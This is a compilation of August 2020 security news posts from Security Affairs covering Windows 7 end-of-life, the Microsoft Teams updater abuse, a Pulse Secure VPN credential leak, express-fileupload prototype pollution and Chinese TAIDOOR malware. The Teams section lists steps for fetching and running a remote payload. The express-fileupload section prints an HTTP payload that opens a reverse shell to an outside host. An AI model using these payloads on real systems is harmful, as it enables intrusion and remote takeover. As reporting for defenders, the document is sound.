(SecurityAffairs – Netwalker ransomware, Forsee Power)

The post Netwalker ransomware operators claim to have stolen data from Forsee Power appeared first on Security Affairs.

FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life

The FBI warned private industry partners of risks impacting companies running Windows 7 after the Microsoft OS reached the end of life on January 14.

The Federal Bureau of Investigation is warning companies running Windows 7 systems of the greater risk of getting hacked because the Microsoft OS has reached the end of life on January 14.

Earlier this week, the FBI sent a private industry notification (PIN Number 20200803-002) to partners in the US private sector.

“The FBI has observed cyber criminals targeting computer network infrastructure after an operating system achieves end of life status,” reads the FBI’s PIN.

“Continuing to use Windows 7 within an enterprise may provide cyber criminals access in to computer systems. As time passes, Windows 7 becomes more vulnerable to exploitation due to lack of security updates and new vulnerabilities discovered.”

“With fewer customers able to maintain a patched Windows 7 system after its end of life, cyber criminals will continue to view Windows 7 as a soft target,”

The Feds urge organizations to upgrade their systems running Windows 7 to newer versions for which the IT giant is still providing security updates.

“Upgrading operating systems to the latest supported version. Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.” continues the PIN.

Microsoft still allows its Windows 7 users to upgrade to Windows 10 for free, but sometimes the underlying hardware doesn’t support the free upgrade.

The FBI cited the case of the previous Windows XP migration: many systems that were not upgraded remained exposed to a significant number of attacks.

“Increased compromises have been observed in the healthcare industry when an operating system has achieved end of life status. After the Windows XP end of life on 28 April 2014, the healthcare industry saw a large increase of exposed records the following year,” the FBI said.

The experts explained that threat actors could exploit multiple known vulnerabilities impacting Windows 7 to compromise the systems running the popular Microsoft OS.

For many of these flaws, working exploits such as EternalBlue and BlueKeep are available online.

The FBI added that several companies have yet to patch their systems and urged them to apply the upgrade; the agency also provided the following recommendations:

  • Ensuring anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.
  • Auditing network configurations and isolate computer systems that cannot be updated.
  • Auditing your network for systems using RDP, closing unused RDP ports, applying two-factor authentication wherever possible, and logging RDP login attempts.

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life appeared first on Security Affairs.

Hackers can abuse Microsoft Teams updater to deliver malicious payloads

Threat actors can abuse Microsoft Teams updater to retrieve and execute malicious code from a remote location.

Security experts from Trustwave detailed a Living Off the Land technique that could allow a threat actor to abuse the MS Teams Updater to download any binary or malicious payload from a remote server.

The bad news is that the issue cannot be easily addressed, because it is a design flaw.

The fix previously applied to the Teams updater consists of restricting its ability to fetch updates via a URL. Instead, the updater only allows local connections, via a share or a local folder, for product updates.

“As per the patch, Microsoft Teams Updater will allow only local network paths to access and update, that means it will detect the string “http/s”, “:”, “/” and port numbers in the updater URL, blocks and log the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log.” reads the analysis published by Trustwave.

The mechanism allows share access in the local UNC format: \\server\

An attacker could exploit it if the following conditions are met:

  1. The attacker has to place the payload file inside the network, in an open shared folder;
  2. The victim machine has to be able to reach the payload on that share.

Experts noticed that this attack scenario is not easy to implement.

To simplify the attack chain, an attacker can create a remote share rather than a local one. In this way, the attacker can have the remote payload downloaded and executed without needing access to a local share.

To create a remote share, the experts set up a Samba server that allowed remote public access; they were then able to download the remote payload and run it from the Microsoft Teams Updater “Update.Exe” using the following command:

Update.exe --update=\\remoteserver\payloadFolder

Microsoft Teams leverages the open-source project Squirrel for installation and updating routines. Squirrel relies on NuGet package manager to create the necessary files.

The payload needs to be named “squirrel.exe” and has to be placed in a specially crafted nupkg file. The file has to be built using the metadata of a fake Microsoft Teams release, and the installation takes place in the AppData folder, which does not require elevated privileges for access.

The post published by Trustwave includes a step by step procedure to carry out the attack to bypass the current mitigations in the application.

Below are the steps to reproduce the attack:

  1. Go to the target application folder “%localappdata%/Microsoft/Teams/” on the victim system
  2. Run the command below:
    update.exe --update=[Samba server containing the above 2 files]
    e.g. update.exe --update=\\remoteserver\payloadFolder

After 10-15 seconds, the payload is downloaded and executed by Microsoft Teams.

The researcher Reegun Jayapaul from Trustwave reported the issue to Microsoft, which provided the following reply:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as “we cannot restrict SMB source for --update because we have customers that apparently rely on this (e.g. folder redirection)” replied Microsoft.

Possible mitigations include monitoring “update.exe” command lines for dubious connections and checking anomalies in the size and the hash of “squirrel.exe.”

Tracking SMB connections, especially those initiated by Microsoft Teams’ updater, could allow defenders to detect this malicious activity.
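As an added illustration of the two mitigations just described (this is not Trustwave's or Microsoft's code), the following Python script applies them to constructed Sysmon-style process creation events: it flags update.exe runs whose --update source is a UNC share not on an allowlist, and compares an observed squirrel.exe against a size/hash baseline. The host names, the allowlist and the baseline values are placeholders.

```python
"""Spot suspicious Microsoft Teams Updater (update.exe) runs in process events.

Added illustrative example, not Trustwave's or Microsoft's code. The events,
host names, allowlist and squirrel.exe baseline below are constructed placeholders.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Squirrel's updater accepts --update=<source> or --update <source>; the source
# may be quoted when it contains spaces.
UPDATE_ARG = re.compile(r'--update(?:=|\s+)(?P<target>"[^"]+"|\S+)', re.IGNORECASE)
# A UNC path of the form \\host\share[\...]
UNC_PATH = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<share>[^\\]+)")

# Placeholder allowlist: internal shares legitimately used as update sources
# (e.g. folder redirection). Replace with your environment's values.
ALLOWED_UPDATE_HOSTS = {"fileserver01.corp.example"}

# Placeholder baseline for the squirrel.exe shipped with the legitimate Teams
# package; record the real size and SHA-256 from a known-good install.
KNOWN_GOOD_SQUIRREL = {"size": 1_234_567, "sha256": "<sha256-of-legitimate-squirrel.exe>"}


@dataclass
class ProcessEvent:
    """Minimal Sysmon-style process creation record (constructed)."""
    image: str
    command_line: str
    user: str


@dataclass
class Finding:
    user: str
    target: str
    reason: str


def is_teams_updater(image: str) -> bool:
    """True if the image is the per-user Teams updater under ...\\Microsoft\\Teams\\."""
    return image.replace("/", "\\").lower().endswith("\\microsoft\\teams\\update.exe")


def extract_update_target(command_line: str) -> Optional[str]:
    """Return the --update source from a command line, unquoted, or None."""
    m = UPDATE_ARG.search(command_line)
    return m.group("target").strip('"') if m else None


def classify(event: ProcessEvent) -> Optional[Finding]:
    """Flag an update.exe run whose update source is a remote, non-allowlisted share."""
    if not is_teams_updater(event.image):
        return None
    target = extract_update_target(event.command_line)
    if target is None:
        return None
    unc = UNC_PATH.match(target)
    if unc:
        host = unc.group("host").lower()
        if host in ALLOWED_UPDATE_HOSTS:
            return None
        return Finding(event.user, target, f"update source is a non-allowlisted share on {host}")
    if re.match(r"^[a-z][a-z0-9+.-]*://", target, re.IGNORECASE):
        # The updater is supposed to block URLs; seeing one is still worth a look.
        return Finding(event.user, target, "update source is a URL")
    return None


def scan(events: List[ProcessEvent]) -> List[Finding]:
    """Run classify() over a batch of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


def squirrel_anomaly(size: int, sha256: str) -> Optional[str]:
    """Compare an observed squirrel.exe against the known-good baseline."""
    if size != KNOWN_GOOD_SQUIRREL["size"]:
        return f"squirrel.exe size {size} differs from baseline {KNOWN_GOOD_SQUIRREL['size']}"
    if sha256.lower() != KNOWN_GOOD_SQUIRREL["sha256"].lower():
        return "squirrel.exe hash does not match the known-good baseline"
    return None


# Constructed sample events: a normal Teams start, an allowlisted internal
# share, a remote share of the kind described above, and an unrelated binary.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
                 r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
                 r"CORP\alice"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
                 r"Update.exe --update=\\fileserver01.corp.example\teams-updates", r"CORP\alice"),
    ProcessEvent(r"C:\Users\bob\AppData\Local\Microsoft\Teams\Update.exe",
                 r"update.exe --update=\\203.0.113.5\payloadFolder", r"CORP\bob"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe",
                 r"notepad.exe --update=\\203.0.113.5\payloadFolder", r"CORP\carol"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {finding.user}: {finding.reason} ({finding.target})")
```

Only the run by bob is reported; the allowlisted internal share and the unrelated binary using the same flag are left alone.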

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Teams)

The post Hackers can abuse Microsoft Teams updater to deliver malicious payloads appeared first on Security Affairs.

Cyber Defense Magazine – August 2020 has arrived. Enjoy it!

Cyber Defense Magazine August 2020 Edition has arrived. We hope you enjoy this month’s edition, packed with over 147 pages of excellent content.

OVER 145 PAGES, ALWAYS FREE – LOADED WITH EXCELLENT CONTENT
Learn from the experts, cybersecurity best practices

Find out about upcoming information security related conferences, expos and trade shows. Always free, no strings attached.

The edition is available in the following formats:

  • Our online ebook library and PDF format (preferred: clicking this link helps fund our free eMagazine, at no charge to you)
  • Standard PDF format
  • Online & mobile flipbook version: www.cyberdefensemagazine.com/newsletters/august-2020/index.html

Do you like Yumpu?  Here’s a Yumpu version:

www.yumpu.com/en/document/view/63770162/cyber-defense-emagazine-august-2020-edition

Enjoy and Thank You for Joining Us!
Let’s get one step ahead of the next threat,
TEAM CYBER DEFENSE MAGAZINE

***NOW ONLINE: OUR SISTER PUBLICATION***
Cyber Security Magazine with a Consumer Focus (B2C) ***NEW***

Don’t miss out: two unique webinars each month. Cyber Defense Webinars

THINK YOU HAVE WHAT IT TAKES? WE HAVE A NEW UPCOMING GAME SHOW, WEBINARS AND OUR ANNUAL AWARDS NOW LAUNCHING:
www.cyberdefenseawards.com

Please visit CYBER DEFENSE TV and watch our latest interviews. We have 80+ NEW INTERVIEWS BEING UPLOADED THIS MONTH! Please visit Cyber Defense Radio for streaming and downloadable podcasts. THE BLACK UNICORN REPORT FOR 2020 IS NOW ONLINE.

Highlighted Sponsors This Month:

  • AIR FORCE CIVILIAN SERVICE
  • BLACK HAT USA 2020
  • RSA CONFERENCE 2020

Want to sponsor our eMagazine? Check out our media kit and reach out to marketing@cyberdefensemagazine.com

Pierluigi Paganini

(SecurityAffairs – hacking, cyber defense magazine)

The post Cyber Defense Magazine – August 2020 has arrived. Enjoy it! appeared first on Security Affairs.

NSA releases a guide to reduce location tracking risks

The United States National Security Agency (NSA) is warning of risks posed by location services for staff who work in defence or national security.

The United States National Security Agency (NSA) published a new guide to warn of the risks posed by location services for staff who work in defence or national security.

The guide, titled “Limiting Location Data Exposure”, warns of the risks posed by the geolocation features implemented in smartphones, tablets, and fitness trackers.

“Mobile devices store and share device geolocation data by design. This data is essential to device communications and provides features—such as mapping applications—that users consider indispensable. Mobile devices determine location through any combination of Global Positioning System (GPS) and wireless signals (e.g., cellular, wireless (Wi-Fi®), or Bluetooth® (BT)).” reads the NSA’s guide. “Location data can be extremely valuable and must be protected. It can reveal details about the number of users in a location, user and supply movements, daily routines (user and organizational), and can expose otherwise unknown associations between users and locations.”

The agency reminds its staff that location data is extremely valuable information that must be properly protected: it can reveal the position of individuals, user and supply movements, and daily routines, among other things. The exposure of such data is especially critical for intelligence and defense personnel.

The guide points out that such devices may be designed to store or transmit location data even when location settings or all wireless capabilities have been disabled.

The guide also highlights that location data from a mobile device can be obtained even without provider cooperation. An attacker could use commercially available rogue base stations to easily obtain real-time location data and track targets.

“This equipment is difficult to distinguish from legitimate equipment, and devices will automatically try to connect to it, if it is the strongest signal present.” continues the guide.

Mitigations could help to reduce, but do not eliminate, location tracking risks in mobile devices. In many cases, users rely on features disabled by such mitigations, making such safeguards impractical.

The guide includes multiple mitigations, including turning off radios when not in use, disabling features like “Find my Phone,” and using a VPN.

The experts also recommend disabling advertising permissions to the greatest extent possible by limiting ad tracking and resetting the advertising ID for the device on a regular basis (at least on a weekly basis).

“While it may not always be possible to completely prevent the exposure of location information, it is possible—through careful configuration and use—to reduce the amount of location data shared,” the guide concludes. “Awareness of the ways in which such information is available is the first step.”

Pierluigi Paganini

(SecurityAffairs – NSA, location services)

The post NSA releases a guide to reduce location tracking risks appeared first on Security Affairs.

Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers

ZDNet has exclusively reported that a list of passwords for 900+ enterprise VPN servers has been shared on a Russian-speaking hacker forum.

ZDNet has exclusively reported that a list of plaintext usernames and passwords for 900 Pulse Secure VPN enterprise servers, along with their IP addresses, has been shared on a Russian-speaking hacker forum.

ZDNet obtained a copy of the list with the help of the threat intelligence firm KELA and verified the authenticity of the data.

The list includes:

  • IP addresses of Pulse Secure VPN servers
  • Pulse Secure VPN server firmware version
  • SSH keys for each server
  • A list of all local users and their password hashes
  • Admin account details
  • Last VPN logins (including usernames and cleartext passwords)
  • VPN session cookies

According to Bank Security, all the Pulse Secure VPN servers included in the list were vulnerable to the CVE-2019-11510 flaw.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerability can be easily exploited using publicly available proof-of-concept code.

In August 2019, researchers from Bad Packets analyzed the number of Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Using the online scanning service BinaryEdge, the researchers found 41,850 Pulse Secure VPN endpoints exposed online, 14,528 of them vulnerable to CVE-2019-11510.

Most of the vulnerable hosts were in the U.S. (5,010), followed by Japan (1,511), the U.K. (830) and Germany (789).


The researchers also analyzed the distribution of the vulnerable hosts by industry and discovered that the flaw affects hosts in:

  • U.S. military, federal, state, and local government agencies
  • Public universities and schools
  • Hospitals and health care providers
  • Electric utilities
  • Major financial institutions
  • Numerous Fortune 500 companies

According to Bad Packets, 677 out of the 913 unique IP addresses found in the list were detected by Bad Packets CTI scans to be vulnerable to CVE-2019-11510 immediately after the exploit was made public in 2019.

Likely the threat actors who compiled this list scanned the internet for Pulse Secure VPN servers between June 24 and July 8, 2020, and exploited the CVE-2019-11510 vulnerability to gather server details.

Companies on the list have to update their Pulse Secure servers and of course, change their passwords.

ZDNet researchers pointed out that ransomware operators could use the leaked credentials to target large enterprises.

“Making matters worse, the list has been shared on a hacker forum that is frequented by multiple ransomware gangs. For example, the REvil (Sodinokibi), NetWalker, Lockbit, Avaddon, Makop, and Exorcist ransomware gangs have threads on the same forum, and use it to recruit members (developers) and affiliates (customers).” reported ZDNet.

Pierluigi Paganini

(SecurityAffairs – hacking, Pulse VPN)

The post Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers appeared first on Security Affairs.

Exclusive: TIM’s Red Team Research finds 4 zero-days in WOWZA Streaming Engine product

Researchers from TIM’s Red Team Research (RTR) have discovered another 4 new zero-day vulnerabilities in the WOWZA Streaming Engine product.

Last month, TIM’s Red Team Research (RTR) disclosed 2 new High-severity vulnerabilities affecting the Oracle Business Intelligence product. Today, TIM’s Red Team Research, led by Massimiliano Brolli, disclosed 4 new vulnerabilities in the WOWZA Streaming Engine product, which the manufacturer addressed between the end of 2019 and July 2020.

WOWZA Streaming Engine

Wowza Streaming Engine (known as Wowza Media Server) is a unified streaming media server software developed by Wowza Media Systems, based in Colorado, United States of America, and used by many US government entities and organizations such as NASA, the US Air Force, Boeing, the New York Police Department, and many other clients around the world.

The vulnerabilities discovered by the team, tracked as CVE-2019-19454, CVE-2019-19455, CVE-2019-19453 and CVE-2019-19456, are an “Arbitrary File Download”, a “Path Traversal” and 2 “Cross-site Scripting” issues respectively (the first two with High severity and the other two with Medium severity). The issues were discovered during laboratory tests and promptly managed in a CVD (Coordinated Vulnerability Disclosure) process with the vendor.

Some of these vulnerabilities can be chained together by a remote attacker to execute arbitrary code on the impacted system; they can also provide full access, through the user interface, to all the data it contains.

The laboratory has been active for less than a year (based on the registered CVEs) and has already identified previously unknown vulnerabilities in products from vendors including NOKIA, Selesta, and Oracle. The research team has identified a total of 16 newly published CVEs, as reported in the NVD (National Vulnerability Database) and on TIM’s corporate website, available at https://www.gruppotim.it/redteam.

TIM is one of the very few Italian industrial realities to conduct research on undocumented vulnerabilities; for this reason I suggest you follow them carefully.


Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection

An expert found a flaw in a popular NodeJS module that can allow attackers to perform a denial-of-service (DoS) attack on a server or achieve arbitrary code execution.

The NodeJS module “express-fileupload” has been downloaded more than 7.3 million times from the npm repository.

The NodeJS module is affected by a ‘Prototype Pollution’ CVE-2020-7699 vulnerability that can allow attackers to perform a denial-of-service (DoS) attack on a server or inject arbitrary code.

“This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.” reads the NIST’s description.

Unfortunately, the actual number of installs could be greater because developers could download the module from alternative repositories, including GitHub and mirror websites.

Prototypes are used to define a JavaScript object’s default structure and default values; they are essential for specifying an expected structure when no values are set.

An attacker who is able to modify a JavaScript object prototype can make an application crash or change its behavior, since the application no longer receives the values it expects.

Given how widespread JavaScript is, the exploitation of prototype pollution flaws could have serious consequences for web applications.

Prototype pollution attacks consist of injecting incompatible types of objects into existing ones to trigger errors that could lead to a Denial of Service (DoS) condition or to arbitrary code execution, including the establishment of a remote shell.

According to the security researcher Posix, who discovered the vulnerability, the issue leverages the “parseNested” feature implemented by express-fileupload.

The express-fileupload module implements several options for uploading and managing files in a NodeJS application. One of the options is parseNested, which expands flattened (dotted) argument names into nested objects.

“Therefore, if we provide {"a.b.c": true} as an input, internally it will be used as {"a": {"b": {"c": true}}}” reads the post published by Posix.

Below is the code that enables the ‘parseNested’ option:

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

// parseNested: multipart field names such as "a.b.c" are expanded into nested objects
app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
  res.end('express-fileupload poc');
});

app.listen(7777);

By placing a “__proto__.toString” field name in the “Content-Disposition” header of the multipart body, an attacker can trigger the attack.

“Therefore, configure and run the express server using express-fileupload in the above form.” continues the post.

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 123

----------1566035451
Content-Disposition: form-data; name="name"; filename="filename"

content
----------1566035451--

The “__proto__” mutator can be used to modify JavaScript’s “Prototype” property as inherited by all JS objects and structures.

This means that the above HTTP request will override and corrupt the built-in “toString” method of every object present in users’ code.
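To make the mechanism concrete, here is an added example (not the project’s code and not from the researcher’s post) that puts a naive dotted-key expander of the kind a parseNested-style option relies on beside a hardened version that refuses prototype-related path segments; isPolluted is a hypothetical helper that reports whether Object.prototype has picked up a property.

```javascript
// Added example, not code from express-fileupload or from the researcher's post.
// It contrasts a naive "a.b.c" -> {a: {b: {c: ...}}} expander with a hardened one.

// Naive expander: creates or descends into each key without checking it.
// For the field name "__proto__.marker", cur["__proto__"] on a plain object
// is Object.prototype itself, so the final assignment lands on every object.
function expandNaive(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const keys = path.split('.');
    let cur = out;
    for (const k of keys.slice(0, -1)) {
      if (typeof cur[k] !== 'object' || cur[k] === null) cur[k] = {};
      cur = cur[k];
    }
    cur[keys[keys.length - 1]] = value;
  }
  return out;
}

// Path segments that let a dotted name reach a prototype instead of a data field.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened expander: rejects prototype-related segments up front, uses
// prototype-less containers so an assignment can never reach Object.prototype,
// and only descends into properties it created itself (own properties).
function expandSafe(flat) {
  const out = Object.create(null);
  for (const [path, value] of Object.entries(flat)) {
    const keys = path.split('.');
    if (keys.some((k) => FORBIDDEN_KEYS.has(k))) {
      throw new Error(`rejected field name: ${path}`);
    }
    let cur = out;
    for (const k of keys.slice(0, -1)) {
      if (!Object.prototype.hasOwnProperty.call(cur, k) || typeof cur[k] !== 'object') {
        cur[k] = Object.create(null);
      }
      cur = cur[k];
    }
    cur[keys[keys.length - 1]] = value;
  }
  return out;
}

// Hypothetical helper: a fresh plain object inheriting `prop` is the observable
// symptom of Object.prototype having been polluted.
function isPolluted(prop) {
  return ({})[prop] !== undefined;
}
```

Running expandNaive on a constructed input such as { "__proto__.polluted": "yes" } makes isPolluted("polluted") true for the whole process, while expandSafe rejects the same input and still expands ordinary names like "a.b.c".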

“If Object.prototype.toString can be polluted, this will cause an error, and for every request, express [sic] always returns 500 error,” continues the researcher.

The researcher also explained that an attacker could exploit the same flaw to get a shell on the vulnerable system. For this variant of the attack, the application running the vulnerable “express-fileupload” version must also use the EJS (Embedded JavaScript templates) templating engine.

“The simplest way to obtain shell through prototype solution in the express application is by using the ejs. Yes, There is a limitation to whether the application should be using the ejs template engine” continues the expert.

An attacker can trigger the issue by sending an HTTP request that overwrites the “outputFunctionName” option of EJS.

The payload below exploits prototype pollution within express-fileupload, and instructs EJS (should it be in use) to execute a NodeJS “child_process.” This process can be used to get a reverse shell to the attacker’s computer.

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 221

----------1566035451
Content-Disposition: form-data; name="__proto__.outputFunctionName";

x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"');x
----------1566035451--

The good news is that immediately after receiving the researcher’s report, the “express-fileupload” maintainers fixed the vulnerability. Users are recommended to get the latest version, 1.1.9, from the npm repository.


UberEats data leaked on the dark web

Security researchers from threat intelligence firm Cyble have discovered user records of the American online food ordering and delivery platform UberEats on the dark web.

Another day, another data breach made the headlines, this time the alleged victim is UberEATS.

UberEats is an American online food ordering and delivery platform launched by Uber in 2014.

During the process of dark web and deep web monitoring, the Cyble Research Team came across a threat actor who leaked user records of UberEATS.

The researchers were able to analyze some files leaked by the threat actor containing details of UberEATS delivery drivers, delivery partners, and customers.

“During our research process, the Cyble Research Team got hold of some informative details related to this leak.” reads the post published by Cyble.

The experts analyzed 9 TXT files leaked by the threat actor which contained details of UberEATS delivery drivers, delivery partners, and customers. The leaked files also include login credentials of 579 UberEATS customers and details of 100 delivery drivers.

Exposed records include information such as login credentials, full name, contact number, trip details, bank card details, and account creation date.


Cyble researchers provided the following recommendations:

  • Never share personal information, including financial information, over the phone, email or SMS
  • Use strong passwords and enforce multi-factor authentication where possible
  • Regularly monitor your financial transactions; if you notice any suspicious transaction, contact your bank immediately
  • Turn on the automatic software update feature on your computer, mobile and other connected devices where possible and pragmatic
  • Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop and mobile
  • People who are concerned about their exposure on the dark web can register at AmiBreached.com to ascertain their exposure


US govt agencies share details of the China-linked espionage malware Taidoor

China-linked hackers carried out cyber espionage campaigns targeting governments, corporations, and think tanks with the TAIDOOR malware.

The FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense (DoD) released information on a RAT variant, dubbed TAIDOOR, used by China-linked hackers in cyber espionage campaigns targeting governments, corporations, and think tanks.

“The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD) have identified a malware variant—referred as TAIDOOR—used by the Chinese government.” reads the US CISA alert.

“CISA encourages users and administrators to review Malware Analysis Report MAR-10292089-1.v1, U.S. Cyber Command’s VirusTotal page, and CISA’s Chinese Malicious Cyber Activity page for more information.”

The U.S. Cyber Command has also uploaded four TAIDOOR samples to the VirusTotal repository.

US government agencies published the Malware Analysis Report MAR-10292089-1.v1 (AR20-216A), which includes technical details of the malicious code, such as indicators of compromise (IOCs) and YARA rules for each sample analyzed by the experts.

“FBI has high confidence that Chinese government actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. CISA, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to Chinese government malicious cyber activity.” reads Malware Analysis Report MAR-10292089-1.v1.

“This MAR includes suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.”

In July, the US Justice Department accused two Chinese hackers of stealing trade secrets from companies worldwide and targeting firms developing a COVID-19 vaccine. In May, the FBI and CISA also warned of cyber attacks coordinated by Beijing and attempting to steal COVID-19 information from the US health care, pharmaceutical, and research sectors.

CISA provides the following recommendations for system administrators and owners to enhance the security of their organizations:

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).
